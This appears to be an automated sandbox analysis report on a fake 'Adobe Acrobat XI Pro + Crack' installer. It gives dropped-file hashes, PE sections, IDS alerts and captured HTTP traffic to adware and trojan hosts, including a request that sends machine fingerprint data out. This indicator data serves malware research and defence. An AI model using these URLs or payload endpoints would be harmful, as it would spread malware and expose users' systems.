ce4b14250ff2c67d88aea6a5dc084652	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe
c17103ae9072a06da581dec998343fc1	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll
c498ae64b4971132bba676873978de1e	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll
7caaf58a526da33c24cbe122e7839693	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll
c2c978b4b608c45c6bf61d68cdedaa0e	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe
fe25dac1837e5c2586e6ad6f00963925	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe
89d40ecddf3ce6f3b0e6a84f40936912	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll
53347df513f9fea942b17dc9fa94bda7	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe
6903caeeb494cf008c1305199ffd2dc4	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46394	856b32eb77dfd6fb67f21d6543272da5
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	154712	1024	3.3278	7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata	192512	40960	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	233472	16944	17408	3.17675	edad92707850619c3a3b7019022a50b3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic=
hxxp://dxfnfnjmewlvs.cloudfront.net/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1
hxxp://di5k50sh3hqjp.cloudfront.net/get.php?ses=482796663418412224
hxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.49.84.66
hxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg	52.222.174.250
hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg	52.222.174.250
hxxp://ee.wintervenepest.bid/report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575	54.88.21.193
hxxp://ee.wintervenepest.bid/report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342	54.88.21.193
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=cp&c=&step=
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M
hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M	104.18.41.31
hxxp://tobacted.info/?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3	104.27.139.167
hxxp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=rx&c=&step=1
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999	104.25.229.18
hxxp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999	54.88.152.23
hxxp://players.movinfra.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
hxxp://players.movinfra.com/css/twin.css
hxxp://e6845.dscb1.akamaiedge.net/crls/secureca.crl
hxxp://e8218.dscb1.akamaiedge.net/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg==
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T
hxxp://players.movinfra.com/js/main.js
hxxp://players.movinfra.com/css/fonts/font-awesome/fontawesome-webfont.eot?
hxxp://www-google-analytics.l.google.com/analytics.js
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz
hxxp://www-google-analytics.l.google.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186
hxxp://players.movinfra.com/img/favicon/cinemaden.com/favicon.ico
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png	107.20.147.93
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M	52.222.174.45
hxxp://tour.cinemaden.com/img/favicon/cinemaden.com/favicon.ico	52.205.102.180
hxxp://www.secularistsarakolet.site/index.php	107.20.147.93
hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic=	52.222.174.188
hxxp://get.gunnightmar.club/stats.php?bu=rx&c=&step=1	52.222.174.219
hxxp://away.yosauruslega.bid/get.php?ses=482796663418412224	52.222.174.149
hxxp://get.gunnightmar.club/stats.php?bu=cp&c=&step=	52.222.174.219
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://tour.cinemaden.com/css/fonts/font-awesome/fontawesome-webfont.eot?	52.205.102.180
hxxp://www.google-analytics.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186	173.194.32.135
hxxp://g.symcd.com/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg==	23.43.139.27
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz	173.194.44.70
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://tour.cinemaden.com/js/main.js	52.205.102.180
hxxp://crl.geotrust.com/crls/secureca.crl	23.43.133.163
hxxp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0	52.205.102.180
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T	173.194.44.70
hxxp://tour.cinemaden.com/css/twin.css	52.205.102.180
hxxp://www.google-analytics.com/analytics.js	173.194.32.135
hxxp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack	52.222.174.55
hxxp://win.ketydesmidiana.bidhxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.49.84.66
hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe	52.222.174.100
hxxp://will.ymuscaesnortin.bidhxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	52.222.174.20
hxxp://ee.wintervenepest.bidhxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2	54.88.21.193
hxxp://get.ynoptisticglob.bid/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1	52.222.174.190
ic-dc.deliverydlcenter.com	52.222.174.140
ajax.googleapis.com	74.125.205.95
fonts.googleapis.com	173.194.222.95
fonts.gstatic.com	74.125.232.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN Backdoor User-Agent (InstallCapital)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE SoundCloud Downloader Install Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET hXXp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: will.ymuscaesnortin.bid

Connection: close

Accept: */*

User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8

Content-Length: 610

Connection: close

Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:20 GMT

X-Cache: Miss from cloudfront

Via: 1.1 05e6fd312b38836c9def63a422bd7429.cloudfront.net (CloudFront)

X-Amz-Cf-Id: vcKTRVplgIUTG_66QpD6lKWviTpBw1QE1sY0ZYnreDadUDujEcGOfA==
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1
006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=
&aff_sub4=&aff_sub5=1352224761&url=http://will.ymusc
aesnortin.bid/offer.php?affId={aff_id}&trackingId=13
9867460&instId=11&ho_trackingid={transaction_id}&c
c={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db
=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028
&v=2">here</a></body>..

GET /analytics.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.google-analytics.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Timing-Allow-Origin: *

Date: Sun, 27 Nov 2016 14:38:31 GMT

Expires: Sun, 27 Nov 2016 16:38:31 GMT

Last-Modified: Wed, 28 Sep 2016 20:19:01 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 11590

Age: 3614

Cache-Control: public, max-age=7200
...........}iw..........tc.m'.a.i|B...F6 ...%.6.F.....o..JR/..{.....s'
V..VK..J.W..Hz...=....S....=$......l.j.......d....?Q...-..K...j(FR..W]
.b._..V.Ea-.6u.......D..gF.....[.<..W...../............`z.....g.l..
~.............>..........GB..N....?...?.I2.....U...o<.....W.;...
x qq......J.......zC.q...?.<.....P.."..[.|.....\P.c...[8.......FB;/
..#..N.........,.:..}.mw.....Bx..?...r=&`..,Q....)j.v..f3.._.y....<
.}..........y.5..l...fk..E.B7].X....%. h...6m...J$O.......!=.P,..$qo..
...]]..8g?....f..Oj......M..b4.$.T$...{...R..^......_.63T-.e..#h7Y.F..
~..}..Q....\..Z.2KKO...on8..%.!.n.."V<Qo.j......0. .o{2..u(uU..M.8.
E..FDs6.y.....7..\..g.....x4.7<.......yg.{f.....>.k/s..V..k....)
....s)..@...$QC.7..\.P*I..uI.E.........U..7.<.]Wy.0.....]..........
..*.2.[.0 @e.1....qXT._... .!8..IO..........L%..}.6.%.u6'"...."*.>.
........[.U]..O.k.p.........C'QwI......*..~(..B.v.g...&.y...@.f....S.9
..........<....8@........r..R..=.y.1..M....D...G..P..O..s.v)/[.....
q.......e.s*.aE3"p[..J.[Xj<}.....u...^^.=.....u.....V....sR....Z...
...Uo....P\........M.!,L..v...[....'.hBd.n.....rr....c..@=.o.N..|A....
C..-.D...ju....E.t....s.......p$.7.HT....S...!.4....]./.X.......C.C.[.
X....~..B.d.../.e.4..O.r*q`.....d.....b...t........../^6.jg:B........'
....x4...w;D...J1.._`.@].s...'*U....&.a.KFD....<.....Y@.7.?U..a...P
..J.V..\%...O'].Q...[.7....Fn...0tgA.2S.#-....._..%....q......f..9...z
Z...l==.R .@..v...."......[.....".".;..YBf....~.....m.$....d42?.9f..K@
........7.Q_..w.<-...;z..|..*..>...D...(?r.....@F.. ..P]...2<<< skipped >>>

GET /css/twin.css HTTP/1.1

Accept: text/css

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Type: text/css

Date: Sun, 27 Nov 2016 15:38:42 GMT

ETag: W/"58372388-3b06f"

Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

transfer-encoding: chunked

Connection: keep-alive
7b54..............gs.J.(....v:&^......x... @....7xC8......M..D.......F
.X*......'....rB......6....o..'.?.../.~.. .7.....;.............$...ed7
u^V...%.Uy.K..^.R...../I.xY.......`8/...)..{^...~...?...?..(-..~i../.3
.x..mU..<.@#ET}w..v.....4J....H...U....W.A.c........cx`....'.q...{.
z.W^={$. #...<....r@......y....C......6"..dy....hl0./n.ZQ.....u....
..../nt..KUX.__..H.../..{......z.}.Q..._........__..#.....k.V..?......
..y......Z ....}q....]....*\.....(......l../g@..g...*...Z.n8....<..
Uc.....P{.@..B.........wh..u....o.o......`......'.=P.x........N.....X.
.....<.X.....:....U..3<bU..7........V..7^j{....f.'.....t.u.:...|
.U.e.3..&(o...-.......3.U5ij..J...........`<........\...........G..
.Ov^.&...5...z....A.}.....f%..W.....Q .f%Q.p.`E&Q.......?}.......c.~..
.~..p..H...8....0'....o.7H.@.x.6.....V.%._...=.....l...S..l.p...7v....
...:`......o@.=}|m.....oyl.....,}s.$...t..nh.~.,a.>.C..6......E....
...$.)...V.-.c..".."s.Pu.dea.``."..y..........K...qc...e8.......A..v!.
.o.....*.$......H.m...q.~..w.^..koK....M5,........./..G.Zn~.X.....l./.
__...#......`.G...C......x.g3..<..m]x....n&.......=.....}0..c......
..b....._n6.o/...2......o....(./.?c..z#.&...}.t.KA`....K...p.....a2...
.........5r...G.({.....g$#..-Y.7....,...9.`.&.....;x.#~d..........7t.B
.........:..z.. .../#.[;......k...e.. ..?.s.B...?>.:L?..?J.....my..
..{%......`.}.#`.U._....`z../.......?....0o2...m............]Y.9.E...=
l..K..R./..g..g....a..8o......D........F"......h.....W..G.o........V..
%..'i/.h~....`I........bX,_........@..)1~x3B~0C.,....F....S...<<<< skipped >>>

GET /css/fonts/font-awesome/fontawesome-webfont.eot? HTTP/1.1

Accept: */*

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://tour.cinemaden.com

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: application/vnd.ms-fontobject

Date: Sun, 27 Nov 2016 15:38:45 GMT

ETag: "57325088-10d0b"

Last-Modified: Tue, 10 May 2016 21:20:08 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 68875

Connection: keep-alive
....%.............................LP.........................^ >...
.................F.o.n.t.A.w.e.s.o.m.e.....R.e.g.u.l.a.r...$.V.e.r.s.i
.o.n. .4...4...0. .2.0.1.5...&.F.o.n.t.A.w.e.s.o.m.e. .R.e.g.u.l.a.r..
...BSGP.........................!..........Y.D.M.F..x...>..........
)Y......h..D....pj.....K......*....0....~.71.^..{.. rAP..u;..3..K..?].
.:..y..f..`..o........&.d:..e.DgK...R..%......q..H...:........<Bt..
..]....Nbf..JH.%.....~..S...G....8.I.a.U.-&..q..1.....#`U.....W.L.g.E.
 q...y..:..g$8..eAV....3.e....u.j...z..i.@.......a.=%..0..O.\O... "3..
ef.0c..@....$.....*...qD..E.".(./.Jv.......,^&N?.'c....-.1f*.}........
......)..k\eL...e......86Qp...f.vX...*X..C.;Ve..P CKW.a.Z...d....?.pK.
U.<T......l......RT........$*.Q........YE............e....OI.....!.
.........FE].CE..r>.s..d.W.....*0#....Q.T.......:...b....#...@Ym...
.{..D.t.......!..Z.....d.......S..........Qv'...x...U.L.89......96....
.,.Be.....r.R... 5.....XW......N..J.._;.J......%.$...-n.pr..t.......pL
...V...{..@....L....."7.....B...|.......7J...c*...e...K..d...=..x.....
..|4.!.d...(.A...`_o...s..[.0H^..L.pa..)1P...8S.A..s6LD....o...K..$.SD
..RIU..W.,. u@:.5W.......NFG.g.i<.Y.F..P`1%..R...Ib..>.....s..g1
{.L.B..#..}aD0.`.C*..............'../a9.....H}...d...#."...4.z.@c1....
5n..@.r...6.7..&...Z..X.06...Ma]..b*....6.....Ql..|.....]..x<..E..D
0f'.B.._.....'.h...A.3...w...7...@o|.../J.[.s......e......../.".RB.mB.
....k>&l@.r....,...4.lg.....:eQ.......Z...<#...(t....8..PaL,n.r'
....n.p8...`:.*.C.(......H2....V.f......S......9..jK;..'".zJ..zY.=<<< skipped >>>

POST hXXp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: will.ymuscaesnortin.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 602

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695
HTTP/1.1 403 Forbidden

Server: CloudFront

Date: Sun, 27 Nov 2016 15:38:15 GMT

Content-Type: text/html

Content-Length: 689

Connection: close

X-Cache: Error from cloudfront

Via: 1.1 93c5c2940efa6748481c787e7c245f82.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: 2V_U9yCYMa6XDO
CQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..

